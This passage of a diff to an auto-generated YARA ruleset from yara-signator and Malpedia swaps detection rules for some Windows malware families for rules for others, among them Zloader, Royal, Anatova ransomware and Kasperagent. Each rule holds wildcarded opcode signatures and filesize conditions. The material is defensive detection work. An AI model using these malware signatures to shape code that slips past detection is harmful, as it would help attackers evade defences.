+		$sequence_7 = { 33c0 5d c3 8b04c524de4000 }
+		$sequence_8 = { 0f85f3020000 e8???????? 84c0 0f85e6020000 6800010000 6a00 }
+		$sequence_9 = { 75f6 33c0 68???????? 8945cc 8845d0 }
 
 	condition:
-		7 of them and filesize < 2277376
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Windealer_Auto : FILE
+rule MALPEDIA_Win_Rgdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87b31818-e67b-5c82-9927-08d581ce1fca"
+		id = "c131d66d-fa54-5330-a7a6-924c788ac07b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.windealer_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rgdoor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "cda4114916f5f955b9ea27c4701626023386bb93ae37a566cf799b5d0e98aca8"
+		logic_hash = "e436d1f0b319cc823655f3b279c99c1561f88f885f295d5e38aafb91490652b3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84558,32 +84871,32 @@ rule MALPEDIA_Win_Windealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 50 56 e8???????? 83c410 8bc7 }
-		$sequence_1 = { ff15???????? 85c0 7407 50 ff15???????? 6a01 }
-		$sequence_2 = { 50 56 e8???????? 83c410 8b4618 }
-		$sequence_3 = { 6a00 ff15???????? 85c0 7407 50 ff15???????? 6a01 }
-		$sequence_4 = { 53 56 57 68da070000 }
-		$sequence_5 = { 668b91d2070000 8a89d0070000 52 51 }
-		$sequence_6 = { 8b4d08 668b91d2070000 8a89d0070000 52 51 }
-		$sequence_7 = { 6a04 50 6a04 68???????? 68???????? }
-		$sequence_8 = { 56 57 68da070000 e8???????? }
-		$sequence_9 = { 8b4d08 668b91d2070000 8a89d0070000 52 }
+		$sequence_0 = { 740a e9???????? 418bfe eb05 bf02000000 418bd6 4533c9 }
+		$sequence_1 = { 488d0dc59d0200 ff15???????? ff15???????? 33c0 }
+		$sequence_2 = { 41c644070889 498b04d0 418064073880 498b04d0 }
+		$sequence_3 = { 488d4d98 e8???????? 90 498d4d04 488d150b8c0200 e8???????? 488bd8 }
+		$sequence_4 = { 43881410 49ffc0 3bcb 0f8c42ffffff }
+		$sequence_5 = { c64405c000 48ffc0 4883f803 7cf0 440fb66dc2 440fb67dc1 }
+		$sequence_6 = { 488d05b9a40100 740f 3908 740e 4883c010 4883780800 }
+		$sequence_7 = { 488d05b97cfeff 4a8b84e8503f0300 400f95c7 03f6 42897c3048 e9???????? 397de8 }
+		$sequence_8 = { 48897c2420 4156 4883ec20 4c8bc2 4863f1 33c0 4885d2 }
+		$sequence_9 = { 41b803010000 488bd6 e8???????? 4889842490000000 4885c0 0f8435010000 381e }
 
 	condition:
-		7 of them and filesize < 770048
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Mortis_Auto : FILE
+rule MALPEDIA_Win_Ehdevel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "795aebf5-a47f-5442-8167-7bfad8d933e5"
+		id = "7db917ef-bc83-5744-b6c0-6eb0a0f20aea"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortis"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mortis_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ehdevel_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "aab52de125cd03f4e28839f7c33e3b05d109e77cc3c335759a1d782c52454873"
+		logic_hash = "9b05c9bc40d7442213206fba6f4d684a37ffe66d5cd633b4545ba4a54fb64f27"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84597,32 +84910,32 @@ rule MALPEDIA_Win_Mortis_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75e5 bf08000000 8b0c1f c1e102 81f900100000 7212 8b50fc }
-		$sequence_1 = { 8b4690 8b4004 c7443090ecc24300 8b4690 8b4804 8d41e8 8944318c }
-		$sequence_2 = { 2bc2 83c0fc 83f81f 0f872c050000 51 52 e8???????? }
-		$sequence_3 = { c1e908 6a0a 8854072a 8b049d201f4400 884c072b 8b049d201f4400 59 }
-		$sequence_4 = { 740f 83f8fe 740a 6bfa38 033c8d201f4400 f6472d01 7418 }
-		$sequence_5 = { e8???????? 8d8564ffffff 50 e8???????? 83c40c e8???????? 0f57c0 }
-		$sequence_6 = { 0f8238feffff 8b55d4 41 8bc2 81f900100000 7210 8b50fc }
-		$sequence_7 = { 2bc1 85c9 0f84c7000000 0fbe0e 40 03c2 894de8 }
-		$sequence_8 = { e8???????? c645fc10 0f57c0 6a04 }
-		$sequence_9 = { eb34 b916000000 3bf1 0f42f1 8d4e01 }
+		$sequence_0 = { c744240c00040000 89742418 ff15???????? 68???????? e8???????? 83c404 5e }
+		$sequence_1 = { 52 8b95ece7ffff 50 51 52 c685f3e7ffff00 e8???????? }
+		$sequence_2 = { 6a00 6800000040 8d85f4efffff 50 ff15???????? 8bf0 }
+		$sequence_3 = { 33cc e8???????? 8be5 5d c3 8d442410 68???????? }
+		$sequence_4 = { 898dc48bffff e8???????? 83c408 8985e88bffff }
+		$sequence_5 = { 668955d4 e8???????? 8bce c745fc0a000000 e8???????? c745fcffffffff }
+		$sequence_6 = { 8b95ece7ffff 83c404 52 e8???????? 8b85ece7ffff 83c404 }
+		$sequence_7 = { 6800008000 6a00 6a00 6a00 8d8df88bffff 51 }
+		$sequence_8 = { 8b4df8 83c404 5f 33cd b001 }
+		$sequence_9 = { 7514 68???????? 6800040000 8d842408080000 50 eb28 68???????? }
 
 	condition:
-		7 of them and filesize < 577536
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Ramsay_Auto : FILE
+rule MALPEDIA_Win_Kgh_Spy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca34f65f-e875-5b7a-bc28-21fb62ed4b88"
+		id = "2adff718-5ead-5f74-948f-adeec6ff4a99"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ramsay_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kgh_spy_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "9a41eaab55357b928cd2c1b68d94938a51a46b8558bc541d5b896032a4300700"
+		logic_hash = "16434283b98a9ec3028553199436a1655677ca0b41828e5ff9ba53861a24c40d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84636,40 +84949,34 @@ rule MALPEDIA_Win_Ramsay_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 7502 eb02 ebb1 }
-		$sequence_1 = { 7514 ff15???????? 83f820 7502 eb07 33c0 }
-		$sequence_2 = { 8b4de8 83b9a001000006 753f c745f401000000 c745f800000000 eb09 }
-		$sequence_3 = { 732c e8???????? 33d2 b93e000000 f7f1 8955f4 }
-		$sequence_4 = { 8b4508 8a481e 884a03 8b5508 8b4508 8a4815 884a1e }
-		$sequence_5 = { c745e800000000 c745ec00000000 c745f088020000 c745f400000000 6888020000 }
-		$sequence_6 = { 8945fc 6a00 6a00 8b55f8 52 8b45fc 50 }
-		$sequence_7 = { 6a00 8d55f4 52 8b450c 8b08 }
-		$sequence_8 = { 8b55e8 0355f8 8a8294010000 8801 ebd3 eb0a 8b4de8 }
-		$sequence_9 = { 8a45ff 884207 c645f000 33c9 894df1 }
-		$sequence_10 = { ff15???????? 33c0 e9???????? e8???????? 85c0 7507 33c0 }
-		$sequence_11 = { e9???????? 41b908000000 4c8d057b560200 8b9424e8010000 }
-		$sequence_12 = { e9???????? 41b80e000000 488d542450 488b8c2408050000 }
-		$sequence_13 = { e9???????? 41b868000000 33d2 488d8c2400070000 }
-		$sequence_14 = { e9???????? 41b8280a0000 33d2 488d4c2460 }
-		$sequence_15 = { e9???????? 41b908000000 4c8d05929b0200 8b542420 }
+		$sequence_0 = { 4889442448 48c7442430ffffffff 48ff442430 488b442448 488b4c2430 803c0800 75eb }
+		$sequence_1 = { e8???????? eb40 4c8d35b7910000 488b0d???????? e9???????? 4c8d35b4910000 488b0d???????? }
+		$sequence_2 = { 32c0 e9???????? 488d442460 4889442448 }
+		$sequence_3 = { 4889442428 4c894c2420 4d8bc8 4c8bc2 488bd1 488d0dcd0d0000 }
+		$sequence_4 = { ff15???????? c744243041000000 eb0a 8b442430 ffc0 89442430 837c24305b }
+		$sequence_5 = { 488b8c24a0000000 ff15???????? 89442468 8b442468 8bc8 e8???????? 48898424d8000000 }
+		$sequence_6 = { 48c744242000000000 4c8b4c2478 448b442440 488b542450 488b4c2448 }
+		$sequence_7 = { ff15???????? 4889442460 48837c2460ff 7507 32c0 }
+		$sequence_8 = { 813850450000 7526 488b442438 83b88400000001 7218 b808000000 486bc000 }
+		$sequence_9 = { 4c8d351a920000 488bfb 83e31f 48c1ff05 }
 
 	condition:
-		7 of them and filesize < 2031616
+		7 of them and filesize < 207872
 }
-rule MALPEDIA_Win_Zloader_Auto : FILE
+rule MALPEDIA_Win_Spedear_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "178c70de-c326-5e7a-939c-09ed0c73d1dc"
+		id = "2a2db92d-f6f5-5c96-a401-91440ad20972"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zloader_auto.yar#L1-L424"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spedear_auto.yar#L1-L261"
 		license_url = "N/A"
-		logic_hash = "f3602cbba95531e02ba22e89ac5b5e6174a07dbda34c6d28cb18aded5d257e41"
+		logic_hash = "124ef5d3fdd777d79cde8845a98f346f93848e564de2656d201aff5229611681"
 		score = 75
-		quality = 50
+		quality = 71
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84681,69 +84988,49 @@ rule MALPEDIA_Win_Zloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb7c0 57 50 53 e8???????? 83c40c }
-		$sequence_1 = { 6aff ff7514 e8???????? 83c40c 84c0 7424 }
-		$sequence_2 = { 0fb7450c 8d9df0feffff 53 50 ff7508 e8???????? 83c40c }
-		$sequence_3 = { 31db 89d8 83c40c 5e 5b }
-		$sequence_4 = { 6a00 e8???????? 83c408 ff75f0 }
-		$sequence_5 = { 7420 e8???????? 84c0 7417 e8???????? }
-		$sequence_6 = { 31db 8d8df0feffff e8???????? 89d8 81c404010000 }
-		$sequence_7 = { 50 ff7508 53 e8???????? 83c40c 66c7047b0000 }
-		$sequence_8 = { 56 50 a1???????? 89c1 }
-		$sequence_9 = { e8???????? 89c1 89f0 99 f7f9 }
-		$sequence_10 = { e8???????? eb00 eb00 eb00 eb00 eb00 eb00 }
-		$sequence_11 = { e8???????? 83f800 0f94c0 2401 }
-		$sequence_12 = { e8???????? a801 7502 eb0f }
-		$sequence_13 = { e8???????? 0fb700 3d64860000 0f94c0 2401 }
-		$sequence_14 = { e8???????? ffd0 488905???????? b001 2401 0fb6c0 }
-		$sequence_15 = { e8???????? 88c1 31c0 f6c101 }
-		$sequence_16 = { 41b802000000 e8???????? a801 7505 e9???????? }
-		$sequence_17 = { e8???????? 59 84c0 7432 68???????? }
-		$sequence_18 = { 84c0 7432 68???????? ff742408 e8???????? 59 }
-		$sequence_19 = { 8bc3 5b c3 8b44240c 83f8ff 750a }
-		$sequence_20 = { 57 56 50 8b4510 31db }
-		$sequence_21 = { 89542444 e8???????? 03c0 6689442438 8b442438 }
-		$sequence_22 = { 6aff 50 e8???????? 8d857cffffff 50 }
-		$sequence_23 = { 50 56 56 56 ff7514 }
-		$sequence_24 = { 5f c6043000 5e c3 56 57 8b7c2414 }
-		$sequence_25 = { 6689442438 8b442438 83c002 668944243a }
-		$sequence_26 = { e8???????? 83c414 c3 56 ff742410 }
-		$sequence_27 = { 50 8d44243c 99 52 50 }
-		$sequence_28 = { 83c410 84c0 741f 8b45c8 3b4604 7617 }
-		$sequence_29 = { 81c614010000 8dbd78feffff f3a5 8d8578feffff 50 ff75fc 66a5 }
-		$sequence_30 = { 89e5 53 57 56 81eca8020000 }
-		$sequence_31 = { c7460488130000 c7462401000000 c7462800004001 e8???????? }
-		$sequence_32 = { 57 56 83ec18 89d6 89cf }
-		$sequence_33 = { 890424 c74424041c010000 e8???????? c74424101c010000 893424 }
-		$sequence_34 = { 8d742410 89b42430010000 8b842430010000 8b842430010000 890424 }
-		$sequence_35 = { 8945ec 890424 e8???????? 8945f0 }
-		$sequence_36 = { 57 50 e8???????? 68???????? 56 e8???????? }
-		$sequence_37 = { 56 57 ff750c 33db 68???????? 6880000000 }
-		$sequence_38 = { c3 8bc2 ebf7 8d442410 50 ff742410 }
-		$sequence_39 = { 33db 68???????? 6880000000 50 e8???????? 83c410 8d4580 }
-		$sequence_40 = { 68???????? ff742410 e8???????? 6823af2930 56 ff742410 }
-		$sequence_41 = { e8???????? ff7508 8d85f0fdffff 68???????? 6804010000 }
-		$sequence_42 = { e8???????? 83c40c 5e 8bc3 5b c3 8b4c2404 }
-		$sequence_43 = { c3 56 8b742408 6804010000 68???????? }
-		$sequence_44 = { c3 8bc2 ebf8 53 8b5c240c }
-		$sequence_45 = { 50 6a72 e8???????? 59 59 }
-		$sequence_46 = { 894c2424 890b 56 8944241c }
+		$sequence_0 = { 99 83e207 03c2 c1f803 83c40c }
+		$sequence_1 = { 8a5f06 50 894608 e8???????? }
+		$sequence_2 = { 53 50 e8???????? 8b7e0c 895e10 }
+		$sequence_3 = { 894618 ffd7 89461c 5f }
+		$sequence_4 = { 5d 5b 5e 32c0 5f 8b4c2428 }
+		$sequence_5 = { 6a00 68???????? e8???????? 83c40c 68d0070000 }
+		$sequence_6 = { 33c0 396f1c 0f8687000000 8b4e04 }
+		$sequence_7 = { 8b0c39 33ca 890f 83c704 836c241801 }
+		$sequence_8 = { 33ce 836c241001 8b742414 75af 8b4204 33c1 8b0a }
+		$sequence_9 = { 7314 57 e8???????? 83c404 5f 896e10 5d }
+		$sequence_10 = { 833e00 741a 6a00 6a00 ff7608 }
+		$sequence_11 = { ff7608 ff5604 6800800000 6a00 ff7608 ff15???????? }
+		$sequence_12 = { 394878 7456 39487c 7451 }
+		$sequence_13 = { 8bc7 5e 5f 5b 5d c3 6a08 }
+		$sequence_14 = { 50 c685ecfeffff00 e8???????? 83c40c 8d8dccfeffff e8???????? }
+		$sequence_15 = { 4d63c0 498bd1 488bcb e8???????? }
+		$sequence_16 = { 4154 4883ec20 4c8d2508910000 33f6 33ff 498bdc 837b0801 }
+		$sequence_17 = { 4883ec20 488d05cf8b0000 8bda 488bf9 488901 }
+		$sequence_18 = { 40 5d c3 e8???????? e8???????? 6a00 ff15???????? }
+		$sequence_19 = { 759f 418b4344 458b5340 4883c302 }
+		$sequence_20 = { 68???????? 6a02 6a65 ff15???????? 50 8bcb e8???????? }
+		$sequence_21 = { c744243004010000 e8???????? 488b4c2438 4c8d5c2430 488d842450010000 488d15f0bd0000 4c895c2428 }
+		$sequence_22 = { ffd7 8bf0 3bf3 7f14 8b75dc 68???????? e8???????? }
+		$sequence_23 = { 488d05cd980000 c3 4053 4883ec20 }
+		$sequence_24 = { 8bb5c4fbffff 6bc009 0fb6843030e92300 6a08 }
+		$sequence_25 = { 7416 488d0d2d120100 e8???????? 85c0 7406 }
+		$sequence_26 = { e8???????? 488be8 4885c0 740d 488d0541be0000 }
 
 	condition:
-		7 of them and filesize < 5360640
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Royal_Ransom_Auto : FILE
+rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a9b95381-6997-59af-bb2e-993bae34608b"
+		id = "e12c2517-7ef6-5ecc-b756-da754e1b9232"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.royal_ransom_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anatova_ransom_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "05ad7a29faf1ca692a5b6df2d422be2fdcf12c3fc6c9f7021ff0ef0bb4b8bcb3"
+		logic_hash = "48354275540a19e149a3ec749fb4eeaa508568399fc971259b74ddc21d53a5fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84757,32 +85044,32 @@ rule MALPEDIA_Win_Royal_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd0 488d0de62fe4ff 488d05cf33e3ff 488903 e9???????? 428d14cd00000000 498bca }
-		$sequence_1 = { b820000000 e8???????? 482be0 488bca e8???????? 488bc8 488d15a73d0800 }
-		$sequence_2 = { 85c0 742c 488b0d???????? 488d15b5220100 e8???????? 85c0 7415 }
-		$sequence_3 = { 85c0 7506 448d7001 eb2e e8???????? 4c8d05a59f0d00 bab4010000 }
-		$sequence_4 = { e8???????? 837f1400 4c8d05cfc01700 488b0f 488b5728 740d 41b9e7000000 }
-		$sequence_5 = { 8d4a8e e8???????? 488b4b20 e8???????? 41b8e1010000 488d155ddf0e00 488bcb }
-		$sequence_6 = { eb33 498bc4 eb4f e8???????? 4c8d058fc01400 ba1c010000 488d0d13c01400 }
-		$sequence_7 = { 7525 e8???????? 4c8d0545051600 baa4060000 488bcb e8???????? baab000000 }
-		$sequence_8 = { e8???????? 8b4730 4c8d057fcd1500 448b4b08 8d4eff 89442428 ba0c010800 }
-		$sequence_9 = { e8???????? 4c8d05cb5a0f00 baab010000 488d0d2f5a0f00 e8???????? 4533c0 418d4e06 }
+		$sequence_0 = { e8???????? 8b4d8c 4863c9 4839c1 0f832a000000 e9???????? 8b458c }
+		$sequence_1 = { 0f8521000000 488b4598 4989c2 4c89d1 }
+		$sequence_2 = { 48898510ffffff 488d051f580000 48898518ffffff 488d051b580000 }
+		$sequence_3 = { e9???????? 48b80000100000000000 e9???????? 488b45e8 4889442428 }
+		$sequence_4 = { 0f8dd3fcffff 83f808 0f845bfcffff 83f809 0f8477fcffff 83f80a 0f8493fcffff }
+		$sequence_5 = { 488b4d10 488b5528 488945c8 488b4520 48894dc0 }
+		$sequence_6 = { 0fb68597fdffff 83f800 0f8405000000 e9???????? 488b8598fdffff 4989c2 }
+		$sequence_7 = { 488945f0 488b45f0 4883f8ff 0f84aa080000 48b80000000000000000 4989c3 488b45f0 }
+		$sequence_8 = { 4889e5 4881ec70000000 b800000000 8845ff 488b05???????? 4883f800 }
+		$sequence_9 = { 488d05d6390000 488985f8feffff 488d05d5390000 48898500ffffff 488d05d3390000 48898508ffffff }
 
 	condition:
-		7 of them and filesize < 6235136
+		7 of them and filesize < 671744
 }
-rule MALPEDIA_Win_Alma_Locker_Auto : FILE
+rule MALPEDIA_Win_Kasperagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aee3e7b2-c800-5626-b16d-a97379fcdea3"
+		id = "340f4639-6fe5-58b0-bb8f-f62f0676eeb4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alma_locker_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kasperagent_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "d029bcdb50f2458857c09101718554ffd09ec8e36a279b20a435629ea205a537"
+		logic_hash = "64254218e6067b681b9ff76df50b8965f4daccd1f710c2911946f314fae43e64"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84796,32 +85083,32 @@ rule MALPEDIA_Win_Alma_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 83bdc8feffff08 720e ffb5b4feffff e8???????? }
-		$sequence_1 = { e8???????? 83c404 83bdc8feffff08 720e ffb5b4feffff e8???????? }
-		$sequence_2 = { 8d8d70fbffff e8???????? 8d85c8faffff c645fc21 50 8bd3 8d8da0fbffff }
-		$sequence_3 = { 8b4da0 e9???????? c3 8b542408 8d420c 8b4aa0 33c8 }
-		$sequence_4 = { 8b8528e5ffff 8b0485e86a0210 ff3401 ff15???????? 85c0 741e 8b8d40e5ffff }
-		$sequence_5 = { c78510ffffff07000000 837dd010 668985fcfeffff 89850cffffff 720b ff75bc e8???????? }
-		$sequence_6 = { 0f8455fdffff 837dd010 8d8d68feffff 6a00 51 ff75cc }
-		$sequence_7 = { 68???????? b9???????? e8???????? 33c0 c645fc1f }
-		$sequence_8 = { 8d8dd0fbffff e8???????? 8d8de8fbffff e8???????? 8d4d08 e8???????? }
-		$sequence_9 = { 8d4d08 e9???????? 8d8de8fbffff e9???????? 8d8dd0fbffff e9???????? }
+		$sequence_0 = { 8b442420 2b442418 8b4c2428 2bc7 40 99 2bc2 }
+		$sequence_1 = { c3 e9???????? 6860020000 b8???????? e8???????? 8b4508 8b35???????? }
+		$sequence_2 = { 3b5c2410 72c3 8b742414 8b7c241c 5d 5b 2bc1 }
+		$sequence_3 = { 8b0f 8bc7 5f c6040e00 5e 5d 5b }
+		$sequence_4 = { 750d 8b46f8 50 56 e8???????? 83c408 85c0 }
+		$sequence_5 = { 8b4c2414 8b01 3b70f8 7fa9 }
+		$sequence_6 = { e8???????? 8b4500 ff442414 b92d000000 66890c78 8d7c3f02 }
+		$sequence_7 = { 668b28 668929 83c102 83c002 47 3bce }
+		$sequence_8 = { ffd0 c645fc01 8b45d8 83c0f0 }
+		$sequence_9 = { 2bc1 33d2 d1f8 2bf0 668911 8bce 781a }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 1605632
 }
-rule MALPEDIA_Win_Lambert_Auto : FILE
+rule MALPEDIA_Win_Radamant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "810c5e09-e6d0-5a3a-ba2c-2c930c946f07"
+		id = "095ef047-a04b-56b2-b6e4-91844a8ad08b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lambert_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.radamant_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "a8d478aa8e5424a909999540bcd026478246ccf020747d754ccdbccaf24eff93"
+		logic_hash = "13bfcc591423cf31741a962660c228f2fa259842a594b9b818753a98c248ff00"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84835,38 +85122,32 @@ rule MALPEDIA_Win_Lambert_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bd8 0f82a4000000 83fe06 0f822cffffff }
-		$sequence_1 = { 3315???????? 05f0000000 832000 33f2 8b55e8 33ce 33d1 }
-		$sequence_2 = { 42 42 3bf9 0f84a8000000 81ef00400000 }
-		$sequence_3 = { 55 8bec 56 8b7510 c1fe04 }
-		$sequence_4 = { 2bc1 3bc7 0f82e5010000 8b4508 2bc2 8d7701 }
-		$sequence_5 = { 4e 8b1f 8919 2bf0 }
-		$sequence_6 = { 33f1 8b4de4 33ce 314de8 }
-		$sequence_7 = { 3bd8 0f826f010000 8a07 8801 41 }
-		$sequence_8 = { 8b55f4 8b4220 50 e8???????? 8945f8 }
-		$sequence_9 = { 8b4814 894df0 8b550c 8b4508 034220 }
-		$sequence_10 = { 03481c 894de4 8b55f4 8b45e4 }
-		$sequence_11 = { c1e90d 8b55f8 c1e213 0bca 894df8 8b45fc 0fbe08 }
-		$sequence_12 = { 7502 eb0b 8b55fc 83c201 8955fc }
-		$sequence_13 = { 8945ec 8b4d0c 8b5508 035124 8955f8 }
-		$sequence_14 = { 83c078 8945f0 8b4df0 83790400 7502 eb4c 8b55f0 }
-		$sequence_15 = { 0fb70c50 894df0 eb02 ebb8 }
+		$sequence_0 = { 89c8 0fb68428e8feffff c1e010 3185d0fdffff 8b85d0fdffff }
+		$sequence_1 = { 8b45f4 83c01c 8b00 c1e818 0fb6c0 0fb680b0094100 31d0 }
+		$sequence_2 = { 31c2 8b45e4 0fb6c0 0fb680b01a4100 }
+		$sequence_3 = { 29c1 89c8 83c061 8945ac e8???????? 89c1 }
+		$sequence_4 = { 8945e0 8b4508 89442408 c7442404???????? 8b45e0 }
+		$sequence_5 = { 8d148500000000 01d0 29c1 89c8 83c061 8945ac }
+		$sequence_6 = { 8d85e4feffff 89442414 8d85e8feffff 89442410 }
+		$sequence_7 = { 8944240c 8b4510 89442408 8b45f8 03450c 83c018 }
+		$sequence_8 = { 83ec04 89850cfeffff c744240810000000 8d8508feffff 89442404 8b8520feffff 890424 }
+		$sequence_9 = { e9???????? c745f800000000 837df806 0f8f8d010000 }
 
 	condition:
-		7 of them and filesize < 1212416
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Blackmagic_Auto : FILE
+rule MALPEDIA_Win_Rover_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "df0b2b99-699a-561e-81a2-262819321991"
+		id = "eae2ea54-1e52-5b6a-97b9-e0561a756b46"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackmagic_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rover_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "8896e03618f3636d9e8021773bcbae5a5f1f7f57b30da18d455d4ffaf6317ffa"
+		logic_hash = "57f684b21a109064243739f52fd53044ef32fd5681c182556fe356fe4b7b3140"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84880,32 +85161,32 @@ rule MALPEDIA_Win_Blackmagic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bcb e8???????? 90 41b940000000 458d41e2 488bd7 488bcb }
-		$sequence_1 = { 4883c430 5f c3 b914000000 e8???????? 33c0 488b5c2440 }
-		$sequence_2 = { ba01000000 488bc8 41ff10 90 488b842490020000 4885c0 7433 }
-		$sequence_3 = { 48895890 48895898 885888 48895880 885c2420 488b02 4c8d4c2430 }
-		$sequence_4 = { 488bce e8???????? 4180e603 ba01000000 488bce 41c0e604 483bfa }
-		$sequence_5 = { 8945b7 498b4e08 48894dbf 488b07 488945cf 4585ff }
-		$sequence_6 = { 440f42c1 488b4b60 e8???????? 488b4360 488b4808 48894b70 e9???????? }
-		$sequence_7 = { 488d0dd58f0200 48890b 488d5308 33c9 48890a 48894a08 488d4808 }
-		$sequence_8 = { 4183f805 757c 8b470c 458d487a c744243001000000 4c8d05ed2c0200 89442428 }
-		$sequence_9 = { 4533c0 e8???????? 90 488d0535330300 488903 488bc3 4883c430 }
